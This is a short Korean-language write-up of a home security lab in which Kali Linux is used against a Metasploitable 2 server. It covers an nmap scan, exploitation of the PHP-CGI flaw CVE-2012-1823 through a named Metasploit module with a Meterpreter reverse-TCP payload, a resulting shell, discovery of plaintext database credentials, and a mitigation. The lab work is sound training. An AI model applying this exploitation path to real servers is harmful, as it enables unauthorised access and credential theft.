
CVE-2012-1823의 가상 보안 랩 구축, 네트워크 정찰 및 익스플로잇을 시연하는 실습 프로젝트입니다.
가상 보안 실습실 구축, 네트워크 정찰, CVE-2012-1823 취약점 공격을 시연하는 실습형 프로젝트입니다.
이 프로젝트는 격리된 가상 실습 환경을 구축하여 전범위 침투 테스트를 수행하는 방법을 보여줍니다. 오래된 Linux 서버를 대상으로 실제 공격을 시뮬레이션하며, 네트워크 탐색부터 시작하여 무단 원격 접근 권한 획득까지 수행했습니다.
안전한 테스트 환경을 보장하기 위해 격리된 가상 네트워크를 구성했습니다. 실습실은 개인 서브넷 상의 Kali Linux 머신과 Metasploitable 2 인스턴스로 구성됩니다.
Nmap을 사용하여 서비스 버전 스캔을 수행하고 열린 포트를 식별했습니다:
nmap -sV 192.168.**.***

Searchsploit 및 CVE 데이터베이스를 사용하여 원격 코드 실행(RCE)이 가능한 PHP-CGI의 중요 취약점인 CVE-2012-1823을 식별했습니다.
RCE(원격 코드 실행)에 취약한 오래된 PHP 버전입니다.
Metasploit Framework를 사용하여 역방향 TCP 핸들러를 구성했습니다:
exploit/multi/http/php_cgi_arg_injectionphp/meterpreter/reverse_tcpwww-data 권한의 Meterpreter 셸을 획득했습니다.
시스템 열거를 수행하고 /var/www/에서 평문 데이터베이스 자격 증명이 포함된 중요한 설정 파일을 발견했습니다.
이 취약점을 완화하기 위해 다음 조치를 권장합니다:
-d, -s, 또는 -t로 시작하는 쿼리 문자열을 차단하도록 구성하십시오.